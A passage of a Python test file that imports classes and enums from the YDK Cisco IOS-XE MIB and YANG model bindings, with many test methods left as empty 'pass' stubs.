from ydk.models.cisco_ios_xe.CISCO_NETSYNC_MIB import CiscoNetsyncEECOption
from ydk.models.cisco_ios_xe.CISCO_NETSYNC_MIB import CiscoNetsyncQLMode
from ydk.models.cisco_ios_xe.CISCO_NETSYNC_MIB import CiscoNetsyncClockMode
from ydk.models.cisco_ios_xe.CISCO_NETSYNC_MIB import CiscoNetsyncQualityLevel
from ydk.models.cisco_ios_xe.CISCO_NETSYNC_MIB import CiscoNetsyncSSMCap
from ydk.models.cisco_ios_xe.CISCO_NETSYNC_MIB import CiscoNetsyncESMCCap
from ydk.models.cisco_ios_xe.CISCO_NETSYNC_MIB import CISCONETSYNCMIB
def test_CISCO_NTP_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_NTP_MIB import NTPLeapIndicator
from ydk.models.cisco_ios_xe.CISCO_NTP_MIB import CISCONTPMIB
def test_CISCO_OSPF_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_OSPF_MIB import CISCOOSPFMIB
def test_CISCO_OSPF_TRAP_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_OSPF_TRAP_MIB import CISCOOSPFTRAPMIB
def test_CISCO_PIM_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_PIM_MIB import CISCOPIMMIB
def test_CISCO_PING_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_PING_MIB import CISCOPINGMIB
def test_CISCO_POWER_ETHERNET_EXT_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_POWER_ETHERNET_EXT_MIB import CpeExtLldpPwrType
from ydk.models.cisco_ios_xe.CISCO_POWER_ETHERNET_EXT_MIB import CpeExtLldpPwrSrc
from ydk.models.cisco_ios_xe.CISCO_POWER_ETHERNET_EXT_MIB import CpeExtPwrPriority
from ydk.models.cisco_ios_xe.CISCO_POWER_ETHERNET_EXT_MIB import CpeExtLldpPwrClassOrZero
from ydk.models.cisco_ios_xe.CISCO_POWER_ETHERNET_EXT_MIB import CISCOPOWERETHERNETEXTMIB
def test_CISCO_PROCESS_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_PROCESS_MIB import CISCOPROCESSMIB
def test_CISCO_PRODUCTS_MIB(self):
pass
def test_CISCO_PTP_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_PTP_MIB import ClockMechanismType
from ydk.models.cisco_ios_xe.CISCO_PTP_MIB import ClockPortState
from ydk.models.cisco_ios_xe.CISCO_PTP_MIB import ClockProfileType
from ydk.models.cisco_ios_xe.CISCO_PTP_MIB import ClockQualityAccuracyType
from ydk.models.cisco_ios_xe.CISCO_PTP_MIB import ClockRoleType
from ydk.models.cisco_ios_xe.CISCO_PTP_MIB import ClockStateType
from ydk.models.cisco_ios_xe.CISCO_PTP_MIB import ClockTimeSourceType
from ydk.models.cisco_ios_xe.CISCO_PTP_MIB import ClockTxModeType
from ydk.models.cisco_ios_xe.CISCO_PTP_MIB import ClockType
from ydk.models.cisco_ios_xe.CISCO_PTP_MIB import CISCOPTPMIB
def test_CISCO_QOS_PIB_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_QOS_PIB_MIB import QueueRange
from ydk.models.cisco_ios_xe.CISCO_QOS_PIB_MIB import ThresholdSetRange
from ydk.models.cisco_ios_xe.CISCO_QOS_PIB_MIB import QosInterfaceQueueType
from ydk.models.cisco_ios_xe.CISCO_QOS_PIB_MIB import CISCOQOSPIBMIB
def test_CISCO_RADIUS_EXT_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_RADIUS_EXT_MIB import CISCORADIUSEXTMIB
def test_CISCO_RF_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_RF_MIB import RFState
from ydk.models.cisco_ios_xe.CISCO_RF_MIB import RFMode
from ydk.models.cisco_ios_xe.CISCO_RF_MIB import RFAction
from ydk.models.cisco_ios_xe.CISCO_RF_MIB import RFSwactReasonType
from ydk.models.cisco_ios_xe.CISCO_RF_MIB import RFIssuState
from ydk.models.cisco_ios_xe.CISCO_RF_MIB import RFIssuStateRev1
from ydk.models.cisco_ios_xe.CISCO_RF_MIB import RFClientStatus
from ydk.models.cisco_ios_xe.CISCO_RF_MIB import CISCORFMIB
def test_CISCO_RTTMON_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_RTTMON_MIB import CISCORTTMONMIB
def test_CISCO_RTTMON_TC_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_RTTMON_TC_MIB import RttReset
from ydk.models.cisco_ios_xe.CISCO_RTTMON_TC_MIB import RttMonOperation
from ydk.models.cisco_ios_xe.CISCO_RTTMON_TC_MIB import RttResponseSense
from ydk.models.cisco_ios_xe.CISCO_RTTMON_TC_MIB import RttMonRttType
from ydk.models.cisco_ios_xe.CISCO_RTTMON_TC_MIB import RttMplsVpnMonRttType
from ydk.models.cisco_ios_xe.CISCO_RTTMON_TC_MIB import RttMplsVpnMonLpdFailureSense
from ydk.models.cisco_ios_xe.CISCO_RTTMON_TC_MIB import RttMplsVpnMonLpdGrpStatus
from ydk.models.cisco_ios_xe.CISCO_RTTMON_TC_MIB import RttMonProtocol
from ydk.models.cisco_ios_xe.CISCO_RTTMON_TC_MIB import RttMonCodecType
from ydk.models.cisco_ios_xe.CISCO_RTTMON_TC_MIB import RttMonLSPPingReplyMode
from ydk.models.cisco_ios_xe.CISCO_RTTMON_TC_MIB import RttMonReactVar
def test_CISCO_SESS_BORDER_CTRLR_CALL_STATS_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_SESS_BORDER_CTRLR_CALL_STATS_MIB import CiscoSbcPeriodicStatsInterval
from ydk.models.cisco_ios_xe.CISCO_SESS_BORDER_CTRLR_CALL_STATS_MIB import CISCOSESSBORDERCTRLRCALLSTATSMIB
def test_CISCO_SESS_BORDER_CTRLR_STATS_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_SESS_BORDER_CTRLR_STATS_MIB import CiscoSbcSIPMethod
from ydk.models.cisco_ios_xe.CISCO_SESS_BORDER_CTRLR_STATS_MIB import CiscoSbcRadiusClientType
from ydk.models.cisco_ios_xe.CISCO_SESS_BORDER_CTRLR_STATS_MIB import CISCOSESSBORDERCTRLRSTATSMIB
def test_CISCO_SIP_UA_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_SIP_UA_MIB import CiscoSipUaMIBNotificationPrefix
from ydk.models.cisco_ios_xe.CISCO_SIP_UA_MIB import CiscoSipUaMIBNotifications
from ydk.models.cisco_ios_xe.CISCO_SIP_UA_MIB import CISCOSIPUAMIB
def test_CISCO_SMI(self):
from ydk.models.cisco_ios_xe.CISCO_SMI import CiscoProducts
from ydk.models.cisco_ios_xe.CISCO_SMI import Local
from ydk.models.cisco_ios_xe.CISCO_SMI import Temporary
from ydk.models.cisco_ios_xe.CISCO_SMI import Pakmon
from ydk.models.cisco_ios_xe.CISCO_SMI import Workgroup
from ydk.models.cisco_ios_xe.CISCO_SMI import OtherEnterprises
from ydk.models.cisco_ios_xe.CISCO_SMI import CiscoSB
from ydk.models.cisco_ios_xe.CISCO_SMI import CiscoSMB
from ydk.models.cisco_ios_xe.CISCO_SMI import CiscoAgentCapability
from ydk.models.cisco_ios_xe.CISCO_SMI import CiscoConfig
from ydk.models.cisco_ios_xe.CISCO_SMI import CiscoMgmt
from ydk.models.cisco_ios_xe.CISCO_SMI import CiscoExperiment
from ydk.models.cisco_ios_xe.CISCO_SMI import CiscoAdmin
from ydk.models.cisco_ios_xe.CISCO_SMI import CiscoProxy
from ydk.models.cisco_ios_xe.CISCO_SMI import CiscoRptrGroupObjectID
from ydk.models.cisco_ios_xe.CISCO_SMI import CiscoUnknownRptrGroup
from ydk.models.cisco_ios_xe.CISCO_SMI import Cisco2505RptrGroup
from ydk.models.cisco_ios_xe.CISCO_SMI import Cisco2507RptrGroup
from ydk.models.cisco_ios_xe.CISCO_SMI import Cisco2516RptrGroup
from ydk.models.cisco_ios_xe.CISCO_SMI import CiscoWsx5020RptrGroup
from ydk.models.cisco_ios_xe.CISCO_SMI import CiscoChipSets
from ydk.models.cisco_ios_xe.CISCO_SMI import CiscoChipSetSaint1
from ydk.models.cisco_ios_xe.CISCO_SMI import CiscoChipSetSaint2
from ydk.models.cisco_ios_xe.CISCO_SMI import CiscoChipSetSaint3
from ydk.models.cisco_ios_xe.CISCO_SMI import CiscoChipSetSaint4
from ydk.models.cisco_ios_xe.CISCO_SMI import CiscoModules
from ydk.models.cisco_ios_xe.CISCO_SMI import Lightstream
from ydk.models.cisco_ios_xe.CISCO_SMI import Ciscoworks
from ydk.models.cisco_ios_xe.CISCO_SMI import Newport
from ydk.models.cisco_ios_xe.CISCO_SMI import CiscoPartnerProducts
from ydk.models.cisco_ios_xe.CISCO_SMI import CiscoPolicy
from ydk.models.cisco_ios_xe.CISCO_SMI import CiscoPIB
from ydk.models.cisco_ios_xe.CISCO_SMI import CiscoPolicyAuto
from ydk.models.cisco_ios_xe.CISCO_SMI import CiscoPibToMib
from ydk.models.cisco_ios_xe.CISCO_SMI import CiscoDomains
from ydk.models.cisco_ios_xe.CISCO_SMI import CiscoTDomainUdpIpv4
from ydk.models.cisco_ios_xe.CISCO_SMI import CiscoTDomainUdpIpv6
from ydk.models.cisco_ios_xe.CISCO_SMI import CiscoTDomainTcpIpv4
from ydk.models.cisco_ios_xe.CISCO_SMI import CiscoTDomainTcpIpv6
from ydk.models.cisco_ios_xe.CISCO_SMI import CiscoTDomainLocal
from ydk.models.cisco_ios_xe.CISCO_SMI import CiscoTDomainClns
from ydk.models.cisco_ios_xe.CISCO_SMI import CiscoTDomainCons
from ydk.models.cisco_ios_xe.CISCO_SMI import CiscoTDomainDdp
from ydk.models.cisco_ios_xe.CISCO_SMI import CiscoTDomainIpx
from ydk.models.cisco_ios_xe.CISCO_SMI import CiscoTDomainSctpIpv4
from ydk.models.cisco_ios_xe.CISCO_SMI import CiscoTDomainSctpIpv6
from ydk.models.cisco_ios_xe.CISCO_SMI import CiscoCIB
from ydk.models.cisco_ios_xe.CISCO_SMI import CiscoCibMmiGroup
from ydk.models.cisco_ios_xe.CISCO_SMI import CiscoCibProvGroup
from ydk.models.cisco_ios_xe.CISCO_SMI import CiscoPKI
def test_CISCO_SONET_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_SONET_MIB import CsApsLineFailureCode
from ydk.models.cisco_ios_xe.CISCO_SONET_MIB import CsApsLineSwitchReason
from ydk.models.cisco_ios_xe.CISCO_SONET_MIB import CISCOSONETMIB
def test_CISCO_STP_EXTENSIONS_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_STP_EXTENSIONS_MIB import CISCOSTPEXTENSIONSMIB
def test_CISCO_ST_TC(self):
from ydk.models.cisco_ios_xe.CISCO_ST_TC import FcPortTypes
from ydk.models.cisco_ios_xe.CISCO_ST_TC import FcPortTxTypes
from ydk.models.cisco_ios_xe.CISCO_ST_TC import FcPortModuleTypes
from ydk.models.cisco_ios_xe.CISCO_ST_TC import FcIfSpeed
from ydk.models.cisco_ios_xe.CISCO_ST_TC import FcAddressType
from ydk.models.cisco_ios_xe.CISCO_ST_TC import InterfaceOperMode
from ydk.models.cisco_ios_xe.CISCO_ST_TC import FcIfServiceStateType
from ydk.models.cisco_ios_xe.CISCO_ST_TC import FcIfSfpDiagLevelType
def test_CISCO_SUBSCRIBER_IDENTITY_TC_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_SUBSCRIBER_IDENTITY_TC_MIB import SubSessionIdentity
from ydk.models.cisco_ios_xe.CISCO_SUBSCRIBER_IDENTITY_TC_MIB import SubscriberMediaType
from ydk.models.cisco_ios_xe.CISCO_SUBSCRIBER_IDENTITY_TC_MIB import SubscriberProtocolType
def test_CISCO_SUBSCRIBER_SESSION_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_SUBSCRIBER_SESSION_MIB import CISCOSUBSCRIBERSESSIONMIB
def test_CISCO_SUBSCRIBER_SESSION_TC_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_SUBSCRIBER_SESSION_TC_MIB import SubSessionType
from ydk.models.cisco_ios_xe.CISCO_SUBSCRIBER_SESSION_TC_MIB import SubSessionState
from ydk.models.cisco_ios_xe.CISCO_SUBSCRIBER_SESSION_TC_MIB import SubSessionRedundancyMode
def test_CISCO_SYSLOG_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_SYSLOG_MIB import SyslogSeverity
from ydk.models.cisco_ios_xe.CISCO_SYSLOG_MIB import CISCOSYSLOGMIB
def test_CISCO_TAP2_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_TAP2_MIB import CISCOTAP2MIB
def test_CISCO_TC(self):
from ydk.models.cisco_ios_xe.CISCO_TC import CiscoNetworkProtocol
from ydk.models.cisco_ios_xe.CISCO_TC import CiscoRowOperStatus
from ydk.models.cisco_ios_xe.CISCO_TC import CiscoLocationClass
from ydk.models.cisco_ios_xe.CISCO_TC import CiscoAlarmSeverity
from ydk.models.cisco_ios_xe.CISCO_TC import CiscoPortListRange
from ydk.models.cisco_ios_xe.CISCO_TC import IfOperStatusReason
def test_CISCO_UBE_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_UBE_MIB import CISCOUBEMIB
def test_CISCO_UNIFIED_FIREWALL_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_UNIFIED_FIREWALL_MIB import CISCOUNIFIEDFIREWALLMIB
def test_CISCO_VLAN_IFTABLE_RELATIONSHIP_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_VLAN_IFTABLE_RELATIONSHIP_MIB import CISCOVLANIFTABLERELATIONSHIPMIB
def test_CISCO_VLAN_MEMBERSHIP_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_VLAN_MEMBERSHIP_MIB import CISCOVLANMEMBERSHIPMIB
def test_CISCO_VOICE_COMMON_DIAL_CONTROL_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_VOICE_COMMON_DIAL_CONTROL_MIB import CvcSpeechCoderRate
from ydk.models.cisco_ios_xe.CISCO_VOICE_COMMON_DIAL_CONTROL_MIB import CvcFaxTransmitRate
from ydk.models.cisco_ios_xe.CISCO_VOICE_COMMON_DIAL_CONTROL_MIB import CvcCoderTypeRate
from ydk.models.cisco_ios_xe.CISCO_VOICE_COMMON_DIAL_CONTROL_MIB import CvcInBandSignaling
from ydk.models.cisco_ios_xe.CISCO_VOICE_COMMON_DIAL_CONTROL_MIB import CvcH320CallType
from ydk.models.cisco_ios_xe.CISCO_VOICE_COMMON_DIAL_CONTROL_MIB import CvcVideoCoderRate
from ydk.models.cisco_ios_xe.CISCO_VOICE_COMMON_DIAL_CONTROL_MIB import CISCOVOICECOMMONDIALCONTROLMIB
def test_CISCO_VOICE_DIAL_CONTROL_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_VOICE_DIAL_CONTROL_MIB import CvCallVolumeWMIntvlType
from ydk.models.cisco_ios_xe.CISCO_VOICE_DIAL_CONTROL_MIB import CvCallVolumeStatsIntvlType
from ydk.models.cisco_ios_xe.CISCO_VOICE_DIAL_CONTROL_MIB import CvSessionProtocol
from ydk.models.cisco_ios_xe.CISCO_VOICE_DIAL_CONTROL_MIB import CvAmrNbRtpEncap
from ydk.models.cisco_ios_xe.CISCO_VOICE_DIAL_CONTROL_MIB import CvIlbcFrameMode
from ydk.models.cisco_ios_xe.CISCO_VOICE_DIAL_CONTROL_MIB import CvCallConnectionType
from ydk.models.cisco_ios_xe.CISCO_VOICE_DIAL_CONTROL_MIB import CISCOVOICEDIALCONTROLMIB
def test_CISCO_VOICE_DNIS_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_VOICE_DNIS_MIB import CISCOVOICEDNISMIB
def test_CISCO_VPDN_MGMT_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_VPDN_MGMT_MIB import TunnelType
from ydk.models.cisco_ios_xe.CISCO_VPDN_MGMT_MIB import EndpointClass
from ydk.models.cisco_ios_xe.CISCO_VPDN_MGMT_MIB import CISCOVPDNMGMTMIB
def test_CISCO_VTP_MIB(self):
from ydk.models.cisco_ios_xe.CISCO_VTP_MIB import VlanType
from ydk.models.cisco_ios_xe.CISCO_VTP_MIB import CISCOVTPMIB
def test_CLAB_DEF_MIB(self):
from ydk.models.cisco_ios_xe.CLAB_DEF_MIB import CLABDEFMIB
def test_CLAB_TOPO_MIB(self):
from ydk.models.cisco_ios_xe.CLAB_TOPO_MIB import CLABTOPOMIB
def test_Cisco_IOS_XE_aaa(self):
pass
def test_Cisco_IOS_XE_aaa_oper(self):
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_aaa_oper import AaaSessProtType
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_aaa_oper import AaaData
def test_Cisco_IOS_XE_acl(self):
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_acl import AclPortType
def test_Cisco_IOS_XE_acl_oper(self):
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_acl_oper import AccessLists
def test_Cisco_IOS_XE_arp(self):
pass
def test_Cisco_IOS_XE_arp_oper(self):
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_arp_oper import IosArpMode
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_arp_oper import ArpData
def test_Cisco_IOS_XE_atm(self):
pass
def test_Cisco_IOS_XE_avb(self):
pass
def test_Cisco_IOS_XE_bba_group(self):
pass
def test_Cisco_IOS_XE_bfd(self):
pass
def test_Cisco_IOS_XE_bfd_oper(self):
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_bfd_oper import BfdOperSessionType
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_bfd_oper import BfdRemoteStateType
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_bfd_oper import BfdStateType
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_bfd_oper import BfdLspType
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_bfd_oper import BfdState
def test_Cisco_IOS_XE_bgp(self):
pass
def test_Cisco_IOS_XE_bgp_common_oper(self):
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_bgp_common_oper import AfiSafi
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_bgp_common_oper import TcpFsmState
def test_Cisco_IOS_XE_bgp_oper(self):
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_bgp_oper import BgpLink
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_bgp_oper import BgpFsmState
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_bgp_oper import BgpMode
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_bgp_oper import BgpStateData
def test_Cisco_IOS_XE_bgp_route_oper(self):
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_bgp_route_oper import BgpOriginCode
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_bgp_route_oper import BgpRpkiStatus
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_bgp_route_oper import BgpRouteFilters
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_bgp_route_oper import BgpNeighborRouteFilters
def test_Cisco_IOS_XE_boot_integrity_oper(self):
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_boot_integrity_oper import BootIntegrityOperData
def test_Cisco_IOS_XE_breakout_port_oper(self):
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_breakout_port_oper import BcChannelSpeed
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_breakout_port_oper import BreakoutPortOperData
def test_Cisco_IOS_XE_bridge_domain(self):
pass
def test_Cisco_IOS_XE_bridge_oper(self):
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_bridge_oper import IntfStatusType
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_bridge_oper import BridgeMacType
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_bridge_oper import BridgeInstances
def test_Cisco_IOS_XE_call_home(self):
pass
def test_Cisco_IOS_XE_card(self):
pass
def test_Cisco_IOS_XE_cdp(self):
pass
def test_Cisco_IOS_XE_cdp_oper(self):
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cdp_oper import CdpDuplex
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cdp_oper import CdpAdvVersion
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cdp_oper import CdpUnidirectionalMode
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cdp_oper import CdpYesNo
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cdp_oper import CdpEnableDisable
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cdp_oper import CdpNeighborDetails
def test_Cisco_IOS_XE_cef(self):
pass
def test_Cisco_IOS_XE_cellular(self):
pass
def test_Cisco_IOS_XE_cellwan_oper(self):
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cellwan_oper import ModemStatus
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cellwan_oper import CwRadioPowerStatus
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cellwan_oper import RadioBandwidth
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cellwan_oper import ModemTechnology
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cellwan_oper import RatPreference
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cellwan_oper import RatTechnology
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cellwan_oper import ServiceStatus
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cellwan_oper import ModemService
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cellwan_oper import LteCa
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cellwan_oper import RegState
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cellwan_oper import PacketSessStatus
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cellwan_oper import ProfileScope
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cellwan_oper import CellwanChv1SimStatus
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cellwan_oper import CellwanSimStatus
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cellwan_oper import CellwanSimUserOp
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cellwan_oper import CwanGpsFeatureState
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cellwan_oper import CwanGpsPortSelected
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cellwan_oper import CwanGpsState
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cellwan_oper import CwanGpsModeSelected
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cellwan_oper import CellwanOperData
def test_Cisco_IOS_XE_cfm_oper(self):
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cfm_oper import CfmLastClearedType
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cfm_oper import CfmStatistics
def test_Cisco_IOS_XE_checkpoint_archive_oper(self):
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_checkpoint_archive_oper import CheckpointArchives
def test_Cisco_IOS_XE_coap(self):
pass
def test_Cisco_IOS_XE_common_types(self):
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_common_types import AddrType
def test_Cisco_IOS_XE_controller(self):
pass
def test_Cisco_IOS_XE_controller_vdsl_oper(self):
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_controller_vdsl_oper import IdbStates
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_controller_vdsl_oper import ModeTc
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_controller_vdsl_oper import VdslOperData
def test_Cisco_IOS_XE_crypto(self):
pass
def test_Cisco_IOS_XE_cts(self):
pass
def test_Cisco_IOS_XE_device_hardware_oper(self):
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_device_hardware_oper import HwType
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_device_hardware_oper import AlarmSeverity
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_device_hardware_oper import DeviceHardwareData
def test_Cisco_IOS_XE_device_sensor(self):
pass
def test_Cisco_IOS_XE_device_tracking(self):
pass
def test_Cisco_IOS_XE_dhcp(self):
pass
def test_Cisco_IOS_XE_dhcp_oper(self):
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_dhcp_oper import DhcpServerBindingState
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_dhcp_oper import DhcpServerBindingType
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_dhcp_oper import DhcpClientState
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_dhcp_oper import DhcpExpiryOption
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_dhcp_oper import DhcpClientIdType
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_dhcp_oper import DhcpOperData
def test_Cisco_IOS_XE_diagnostics(self):
pass
def test_Cisco_IOS_XE_diffserv_target_oper(self):
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_diffserv_target_oper import Direction
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_diffserv_target_oper import Inbound
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_diffserv_target_oper import Outbound
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_diffserv_target_oper import DiffservInterfacesState
def test_Cisco_IOS_XE_dot1x(self):
pass
def test_Cisco_IOS_XE_eem(self):
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_eem import OperatorType
def test_Cisco_IOS_XE_efp_oper(self):
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_efp_oper import EfpStats
def test_Cisco_IOS_XE_eigrp(self):
pass
def test_Cisco_IOS_XE_environment_oper(self):
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_environment_oper import SensorUnitsType
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_environment_oper import EnvironmentSensors
def test_Cisco_IOS_XE_eta(self):
pass
def test_Cisco_IOS_XE_ethernet(self):
pass
def test_Cisco_IOS_XE_event_history_types(self):
pass
def test_Cisco_IOS_XE_ezpm(self):
pass
def test_Cisco_IOS_XE_features(self):
pass
def test_Cisco_IOS_XE_fib_oper(self):
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_fib_oper import FibAddressFamily
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_fib_oper import EncapsulationHeaderType
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_fib_oper import FibPathType
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_fib_oper import FibOperData
def test_Cisco_IOS_XE_flow(self):
pass
def test_Cisco_IOS_XE_flow_monitor_oper(self):
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_flow_monitor_oper import FlowExporterIpwriteStatsType
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_flow_monitor_oper import FlowMonitorCacheType
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_flow_monitor_oper import FlowMonitorCacheState
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_flow_monitor_oper import FlowMonitors
def test_Cisco_IOS_XE_fw_oper(self):
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_fw_oper import FwOperData
def test_Cisco_IOS_XE_http(self):
pass
def test_Cisco_IOS_XE_icmp(self):
pass
def test_Cisco_IOS_XE_igmp(self):
pass
def test_Cisco_IOS_XE_interface_common(self):
pass
def test_Cisco_IOS_XE_interfaces(self):
pass
def test_Cisco_IOS_XE_interfaces_oper(self):
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_interfaces_oper import QosMatchType
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_interfaces_oper import ThreshUnit
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_interfaces_oper import QosDirection
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_interfaces_oper import AggregationType
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_interfaces_oper import IntfState
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_interfaces_oper import EtherDuplex
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_interfaces_oper import EtherSpeed
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_interfaces_oper import OperState
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_interfaces_oper import IetfIntfType
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_interfaces_oper import SerialCrc
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_interfaces_oper import SubrateSpeed
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_interfaces_oper import T1e1LoopbackMode
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_interfaces_oper import Interfaces
def test_Cisco_IOS_XE_ios_common_oper(self):
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_ios_common_oper import IosSnpaType
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_ios_common_oper import IosEncapsType
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_ios_common_oper import IosLinktype
def test_Cisco_IOS_XE_ip(self):
pass
def test_Cisco_IOS_XE_ip_sla_oper(self):
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_ip_sla_oper import SlaOperType
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_ip_sla_oper import SlaReturnCode
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_ip_sla_oper import AccuracyType
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_ip_sla_oper import RttType
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_ip_sla_oper import TtlType
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_ip_sla_oper import IpSlaStats
def test_Cisco_IOS_XE_ipv6(self):
pass
def test_Cisco_IOS_XE_ipv6_oper(self):
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_ipv6_oper import Ipv6NdTdlState
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_ipv6_oper import Ipv6Data
def test_Cisco_IOS_XE_isis(self):
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_isis import IsisLevelType
from ydk.models.cisco_ios_xe.Cisco_IOS_XE_isis import IsisRoutesLevelType
